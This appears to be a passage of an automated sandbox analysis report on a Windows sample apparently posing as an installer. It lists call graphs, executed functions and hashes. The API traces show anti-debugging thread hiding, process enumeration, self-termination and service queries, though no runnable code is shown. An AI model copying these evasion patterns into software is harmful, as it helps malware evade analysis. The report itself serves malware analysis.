64419->64420 64422 6c10bcad __wsopen_s 64420->64422 64421 6c1050c3 64424 6c104f2e 64421->64424 64422->64421 64434 6c107eab HeapFree GetLastError _free 64422->64434 64426 6c104f40 64424->64426 64428 6c104f5e 64424->64428 64425 6c104f4e 64435 6c103810 18 API calls __cftoe 64425->64435 64426->64425 64426->64428 64430 6c104f76 _Yarn 64426->64430 64433 6c10bd49 62 API calls 64428->64433 64429 6c1043a9 62 API calls 64429->64430 64430->64428 64430->64429 64431 6c10d350 18 API calls 64430->64431 64432 6c10f25c __wsopen_s 62 API calls 64430->64432 64431->64430 64432->64430 64433->64415 64434->64421 64435->64428 64437 6c0f9715 64436->64437 64438 6bfc2020 52 API calls 64437->64438 64439 6c0f97b6 64438->64439 64440 6c0fa133 std::_Facet_Register 4 API calls 64439->64440 64441 6c0f97ee 64440->64441 64442 6c0faa17 43 API calls 64441->64442 64443 6c0f9802 64442->64443 64444 6bfc1d90 89 API calls 64443->64444 64445 6c0f98ab 64444->64445 64446 6c0f98dc 64445->64446 64490 6bfc2250 30 API calls 64445->64490 64446->63909 64448 6c0f9916 64491 6bfc26e0 24 API calls 4 library calls 64448->64491 64450 6c0f9928 64492 6c0fca69 RaiseException 64450->64492 64452 6c0f993d 64493 6bfbe010 67 API calls 64452->64493 64454 6c0f994f 64454->63909 64456 6c0f9a7d 64455->64456 64494 6c0f9c90 64456->64494 64458 6c0f9b6c 64458->63914 64459 6c0f9a95 64459->64458 64512 6bfc2250 30 API calls 64459->64512 64513 6bfc26e0 24 API calls 4 library calls 64459->64513 64514 6c0fca69 RaiseException 64459->64514 64464 6bfd304f 64463->64464 64467 6bfd3063 64464->64467 64523 6bfc3560 32 API calls std::_Xinvalid_argument 64464->64523 64468 6bfd311e 64467->64468 64525 6bfc2250 30 API calls 64467->64525 64526 6bfc26e0 24 API calls 4 library calls 64467->64526 64527 6c0fca69 RaiseException 64467->64527 64469 6bfd3131 64468->64469 64524 6bfc37e0 32 API calls std::_Xinvalid_argument 64468->64524 64469->63914 64474 6c0f928e 64473->64474 64478 6c0f92c1 64473->64478 64476 6bfc01f0 64 API calls 64474->64476 64475 6c0f9373 64475->63920 64477 6c0f92b4 64476->64477 64479 6c104208 67 API calls 64477->64479 64478->64475 64528 6bfc2250 30 API calls 64478->64528 64479->64478 64481 6c0f939e 64529 6bfc2340 24 API calls 64481->64529 64483 6c0f93ae 64530 6c0fca69 RaiseException 64483->64530 64485 6c0f93b9 64531 6bfbe010 67 API calls 64485->64531 64487 6c0f9412 std::ios_base::_Ios_base_dtor 64487->63920 64488->63912 64489->63919 64490->64448 64491->64450 64492->64452 64493->64454 64495 6c0f9ccc 64494->64495 64496 6c0f9cf8 64494->64496 64497 6c0f9cf1 64495->64497 64517 6bfc2250 30 API calls 64495->64517 64502 6c0f9d09 64496->64502 64515 6bfc3560 32 API calls std::_Xinvalid_argument 64496->64515 64497->64459 64500 6c0f9ed8 64518 6bfc2340 24 API calls 64500->64518 64502->64497 64516 6bfc2f60 42 API calls 4 library calls 64502->64516 64503 6c0f9ee7 64519 6c0fca69 RaiseException 64503->64519 64507 6c0f9f17 64521 6bfc2340 24 API calls 64507->64521 64509 6c0f9f2d 64522 6c0fca69 RaiseException 64509->64522 64511 6c0f9d43 64511->64497 64520 6bfc2250 30 API calls 64511->64520 64512->64459 64513->64459 64514->64459 64515->64502 64516->64511 64517->64500 64518->64503 64519->64511 64520->64507 64521->64509 64522->64497 64523->64467 64524->64469 64525->64467 64526->64467 64527->64467 64528->64481 64529->64483 64530->64485 64531->64487 64532 6bf73d62 64534 6bf73bc0 64532->64534 64533 6bf73e8a GetCurrentThread NtSetInformationThread 64535 6bf73eea 64533->64535 64534->64533 64536 6bf8f150 64538 6bf8efbe 64536->64538 64537 6bf8f243 CreateFileA 64540 6bf8f2a7 64537->64540 64538->64537 64539 6bf902ca 64540->64539 64541 6bf902ac GetCurrentProcess TerminateProcess 64540->64541 64541->64539 64542 6bf83b72 64543 6c0fa133 std::_Facet_Register 4 API calls 64542->64543 64550 6bf837e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 64543->64550 64544 6c0ee090 2 API calls 64544->64550 64546 6bf96ba0 104 API calls 64546->64550 64547 6bf96e60 32 API calls 64547->64550 64548 6bf97090 77 API calls 64548->64550 64550->64544 64550->64546 64550->64547 64550->64548 64552 6bf9639e 64550->64552 64555 6bfbe010 67 API calls 64550->64555 64556 6c103820 18 API calls 2 library calls 64552->64556 64555->64550 64557 6bf8f8a3 64559 6bf8f887 64557->64559 64558 6bf902ac GetCurrentProcess TerminateProcess 64560 6bf902ca 64558->64560 64559->64558 64561 6c10262f 64562 6c10263b __wsopen_s 64561->64562 64563 6c102642 GetLastError ExitThread 64562->64563 64564 6c10264f 64562->64564 64565 6c1080a2 __Getctype 37 API calls 64564->64565 64566 6c102654 64565->64566 64573 6c10d456 64566->64573 64569 6c10266b 64579 6c10259a 16 API calls 2 library calls 64569->64579 64572 6c10268d 64574 6c10265f 64573->64574 64575 6c10d468 GetPEB 64573->64575 64574->64569 64578 6c10a45f 5 API calls std::_Lockit::_Lockit 64574->64578 64575->64574 64576 6c10d47b 64575->64576 64580 6c10a508 5 API calls std::_Lockit::_Lockit 64576->64580 64578->64569 64579->64572 64580->64574

                            Executed Functions

                            Function 6BF74754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: 592af67698cc265935206baf8029ba2869aabb383b79198237dadcf4f53f2680
                            • Instruction ID: 59c7cf3ac05874eb06e3969895dcb369c5b84ece38ae678d9bacd378df288f5a
                            • Opcode Fuzzy Hash: 592af67698cc265935206baf8029ba2869aabb383b79198237dadcf4f53f2680
                            • Instruction Fuzzy Hash: 3274E772644B018FC738CF28D8D0695B7F3EF953147198ABEC0A68B665E778B54ACB40
                            Function 6C0F8930 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4604 6c0f8930-6c0f8964 CreateToolhelp32Snapshot 4605 6c0f8980-6c0f8989 4604->4605 4606 6c0f898b-6c0f8990 4605->4606 4607 6c0f89d0-6c0f89d5 4605->4607 4608 6c0f8a0d-6c0f8a12 4606->4608 4609 6c0f8992-6c0f8997 4606->4609 4610 6c0f89d7-6c0f89dc 4607->4610 4611 6c0f8a34-6c0f8a62 call 6c0ff010 Process32FirstW 4607->4611 4616 6c0f8a8b-6c0f8a90 4608->4616 4617 6c0f8a14-6c0f8a2f CloseHandle 4608->4617 4612 6c0f8999-6c0f899e 4609->4612 4613 6c0f8966-6c0f8973 4609->4613 4614 6c0f8a64-6c0f8a71 Process32NextW 4610->4614 4615 6c0f89e2-6c0f89e7 4610->4615 4619 6c0f8a76-6c0f8a86 4611->4619 4612->4605 4621 6c0f89a0-6c0f89ca call 6c1062f5 4612->4621 4613->4605 4614->4619 4615->4605 4622 6c0f89e9-6c0f8a08 4615->4622 4616->4605 4620 6c0f8a96-6c0f8aa4 4616->4620 4617->4605 4619->4605 4621->4605 4622->4605
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0F893E
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 5e9569a995a674e1e66a4213c62e9d7f92f5171ef7b0ef18ff2dd56745a8c9ac
                            • Instruction ID: c409baba07b2d135411b8075cd01e3a205fd291e8746dcc822c076fe039e5f6d
                            • Opcode Fuzzy Hash: 5e9569a995a674e1e66a4213c62e9d7f92f5171ef7b0ef18ff2dd56745a8c9ac
                            • Instruction Fuzzy Hash: 3C3150702093019FDB019F5AD88479EBBE4AF86708F544A2EE8E8D6360D731D8868B53
                            Function 6BF73886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4877 6bf73886-6bf7388e 4878 6bf73894-6bf73896 4877->4878 4879 6bf73970-6bf7397d 4877->4879 4878->4879 4882 6bf7389c-6bf738b9 4878->4882 4880 6bf739f1-6bf739f8 4879->4880 4881 6bf7397f-6bf73989 4879->4881 4884 6bf73ab5-6bf73aba 4880->4884 4885 6bf739fe-6bf73a03 4880->4885 4881->4882 4883 6bf7398f-6bf73994 4881->4883 4886 6bf738c0-6bf738c1 4882->4886 4889 6bf73b16-6bf73b18 4883->4889 4890 6bf7399a-6bf7399f 4883->4890 4884->4882 4888 6bf73ac0-6bf73ac7 4884->4888 4891 6bf738d2-6bf738d4 4885->4891 4892 6bf73a09-6bf73a2f 4885->4892 4887 6bf7395e 4886->4887 4895 6bf73960-6bf73964 4887->4895 4888->4886 4894 6bf73acd-6bf73ad6 4888->4894 4889->4886 4896 6bf739a5-6bf739bf 4890->4896 4897 6bf7383b-6bf73855 call 6c0c2a20 call 6c0c2a30 4890->4897 4893 6bf73957-6bf7395c 4891->4893 4898 6bf73a35-6bf73a3a 4892->4898 4899 6bf738f8-6bf73955 4892->4899 4893->4887 4894->4889 4900 6bf73ad8-6bf73aeb 4894->4900 4903 6bf73860-6bf73885 4895->4903 4904 6bf7396a 4895->4904 4902 6bf73a5a-6bf73a5d 4896->4902 4897->4903 4905 6bf73a40-6bf73a57 4898->4905 4906 6bf73b1d-6bf73b22 4898->4906 4899->4893 4900->4899 4907 6bf73af1-6bf73af8 4900->4907 4913 6bf73a87-6bf73aa7 4902->4913 4914 6bf73aa9-6bf73ab0 4902->4914 4903->4877 4912 6bf73ba1-6bf73bb6 4904->4912 4905->4902 4909 6bf73b24-6bf73b44 4906->4909 4910 6bf73b49-6bf73b50 4906->4910 4916 6bf73b62-6bf73b85 4907->4916 4917 6bf73afa-6bf73aff 4907->4917 4909->4913 4910->4886 4919 6bf73b56-6bf73b5d 4910->4919 4915 6bf73bc0-6bf73bda call 6c0c2a20 call 6c0c2a30 4912->4915 4913->4914 4914->4895 4928 6bf73be0-6bf73bfe 4915->4928 4916->4899 4924 6bf73b8b 4916->4924 4917->4893 4919->4895 4924->4912 4931 6bf73c04-6bf73c11 4928->4931 4932 6bf73e7b 4928->4932 4934 6bf73c17-6bf73c20 4931->4934 4935 6bf73ce0-6bf73cea 4931->4935 4933 6bf73e81-6bf73ee0 call 6bf73750 GetCurrentThread NtSetInformationThread 4932->4933 4949 6bf73eea-6bf73f04 call 6c0c2a20 call 6c0c2a30 4933->4949 4939 6bf73c26-6bf73c2d 4934->4939 4940 6bf73dc5 4934->4940 4936 6bf73cec-6bf73d0c 4935->4936 4937 6bf73d3a-6bf73d3c 4935->4937 4941 6bf73d90-6bf73d95 4936->4941 4942 6bf73d70-6bf73d8d 4937->4942 4943 6bf73d3e-6bf73d45 4937->4943 4946 6bf73dc3 4939->4946 4947 6bf73c33-6bf73c3a 4939->4947 4945 6bf73dc6 4940->4945 4950 6bf73d97-6bf73db8 4941->4950 4951 6bf73dba-6bf73dc1 4941->4951 4942->4941 4948 6bf73d50-6bf73d57 4943->4948 4952 6bf73dc8-6bf73dcc 4945->4952 4946->4940 4953 6bf73e26-6bf73e2b 4947->4953 4954 6bf73c40-6bf73c5b 4947->4954 4948->4945 4971 6bf73f75-6bf73fa1 4949->4971 4950->4940 4951->4946 4956 6bf73dd7-6bf73ddc 4951->4956 4952->4928 4958 6bf73dd2 4952->4958 4959 6bf73e31 4953->4959 4960 6bf73c7b-6bf73cd0 4953->4960 4957 6bf73e1b-6bf73e24 4954->4957 4963 6bf73e36-6bf73e3d 4956->4963 4964 6bf73dde-6bf73e17 4956->4964 4957->4952 4961 6bf73e76-6bf73e79 4958->4961 4959->4915 4960->4948 4961->4933 4965 6bf73e3f-6bf73e5a 4963->4965 4966 6bf73e5c-6bf73e5f 4963->4966 4964->4957 4965->4957 4966->4960 4969 6bf73e65-6bf73e69 4966->4969 4969->4952 4969->4961 4975 6bf73fa3-6bf73fa8 4971->4975 4976 6bf74020-6bf74026 4971->4976 4977 6bf73fae-6bf73fcf 4975->4977 4978 6bf7407c-6bf74081 4975->4978 4979 6bf73f06-6bf73f35 4976->4979 4980 6bf7402c-6bf7403c 4976->4980 4981 6bf740aa-6bf740ae 4977->4981 4978->4981 4982 6bf74083-6bf7408a 4978->4982 4983 6bf73f38-6bf73f61 4979->4983 4984 6bf740b3-6bf740b8 4980->4984 4985 6bf7403e-6bf74058 4980->4985 4986 6bf73f6b-6bf73f6f 4981->4986 4982->4983 4987 6bf74090 4982->4987 4989 6bf73f64-6bf73f67 4983->4989 4984->4977 4988 6bf740be-6bf740c9 4984->4988 4990 6bf7405a-6bf74063 4985->4990 4986->4971 4987->4949 4988->4981 4991 6bf740cb-6bf740d4 4988->4991 4992 6bf73f69 4989->4992 4993 6bf740f5-6bf7413f 4990->4993 4994 6bf74069-6bf7406c 4990->4994 4997 6bf740a7 4991->4997 4998 6bf740d6-6bf740f0 4991->4998 4992->4986 4993->4992 4995 6bf74144-6bf7414b 4994->4995 4996 6bf74072-6bf74077 4994->4996 4995->4986 4996->4989 4997->4981 4998->4990
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 729ffab1d06836f4d4cd5bf3e880a13a602f47e73b8e0a1283b129930850f1e5
                            • Instruction ID: dd1e2a148e335a7281d9b99250fa243ec568a6fcf0518504545e28c8c93eb276
                            • Opcode Fuzzy Hash: 729ffab1d06836f4d4cd5bf3e880a13a602f47e73b8e0a1283b129930850f1e5
                            • Instruction Fuzzy Hash: E932B233244B018FC334CF28D890695B7E3EF953147698AAEC0EA5B6A5D779B44BCB50
                            Function 6BF73A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 3340ccee4f1b99afc0da7b15bb655d76f117170b6c9cf2dc59b2343fe0d48fb3
                            • Instruction ID: d37f8a5cd0a388afd14c33f9d5a433aae1aad569bb5ba2ea9146a935b353696a
                            • Opcode Fuzzy Hash: 3340ccee4f1b99afc0da7b15bb655d76f117170b6c9cf2dc59b2343fe0d48fb3
                            • Instruction Fuzzy Hash: 8F51C033554B019FC331DF28D4807C5B7E3AF95310F658AAEC0E61B6A5DB79B44A8B41
                            Function 6BF739CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: ee906603786dd1558aa7e703ecb83ec436105050c4edfd4766b9d2d2d2d57d54
                            • Instruction ID: 784404f751000b6467abbb85973e5fd6775cd51a5a985c636c4ff37aba2fca74
                            • Opcode Fuzzy Hash: ee906603786dd1558aa7e703ecb83ec436105050c4edfd4766b9d2d2d2d57d54
                            • Instruction Fuzzy Hash: 8551DC33504B01DBC330DF28D480795B7E3AF95310F658AAEC0EA5B6A1DB78B44B8B81
                            Function 6BF73D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 06abe5b232cf6d6bae9fe44162bd2f82fe6ef84ee3f2ad0d1bfe179f83c2db4e
                            • Instruction ID: e70801975fa0a9ac1f620d376ce3d2c680a6c38059f04150cd1a31e5e42b9352
                            • Opcode Fuzzy Hash: 06abe5b232cf6d6bae9fe44162bd2f82fe6ef84ee3f2ad0d1bfe179f83c2db4e
                            • Instruction Fuzzy Hash: 2E312433654B01CFC330DF38D8847C6B7A3AF95314F154AAEC0A65B6A0DB78700A8B52
                            Function 6BF73D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 3938c4ec921a95f8139f6707f8ceb84b8560f14c603c05ad2f216a0125260f89
                            • Instruction ID: 78cca66955451430a525c60fd9d5edafd9ba9f5fd101bea93b253afbd5013fa3
                            • Opcode Fuzzy Hash: 3938c4ec921a95f8139f6707f8ceb84b8560f14c603c05ad2f216a0125260f89
                            • Instruction Fuzzy Hash: C731F033114B01DBC734DF28D480796B7A3AF95304F254AAEC0EA4B2A1DB7970068B92
                            Function 6C0F8810 Relevance: 3.1, APIs: 2, Instructions: 72serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0F8820
                            • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6C0F88C5
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Open$ManagerService
                            • String ID:
                            • API String ID: 2351955762-0
                            • Opcode ID: 659a5cac50a1f9c3241f2dbbf88c5113de9273f0d5f5d145bfb92dd264cd075e
                            • Instruction ID: 18952b398cd5c465ca5d820e9eb30f5ed8df45d87ce722a50c0cd5cef9f94370
                            • Opcode Fuzzy Hash: 659a5cac50a1f9c3241f2dbbf88c5113de9273f0d5f5d145bfb92dd264cd075e
                            • Instruction Fuzzy Hash: 8C311A74508302AFD700CF29C849B4EBBF0AB8A754F54895AF8A4D7261D271C88A9B63
                            Function 6BF73C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: e4e179ae864ce4e9c30a18518e701b08713b222785fd702eeed0d85736163cc7
                            • Instruction ID: 70887e545599ac2062e925480c7d873b8336fadd7a888b12f35044b61acfd69c
                            • Opcode Fuzzy Hash: e4e179ae864ce4e9c30a18518e701b08713b222785fd702eeed0d85736163cc7
                            • Instruction Fuzzy Hash: 1821E573218701DBD734EF24D8947D6B7B3AF46304F544AAEC0A64B6A0EB7874068B92
                            Function 6C0EE090 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6C0EE0AC
                            • FindClose.KERNEL32(000000FF), ref: 6C0EE0E2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 3eab0afd5e903adc270d060bd5f7eb17fadb95a16639aafec1b33f41291ab8c0
                            • Instruction ID: 06e388040393c732c14973f30522341bdd8ed796c86bd03cfd7334f3210b09a8
                            • Opcode Fuzzy Hash: 3eab0afd5e903adc270d060bd5f7eb17fadb95a16639aafec1b33f41291ab8c0
                            • Instruction Fuzzy Hash: 6F1125746487559FC7208F28D944A4ABBE4AB8A314F548D5AE4B8CA7A0D734D988CB82
                            Function 6C1101C3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
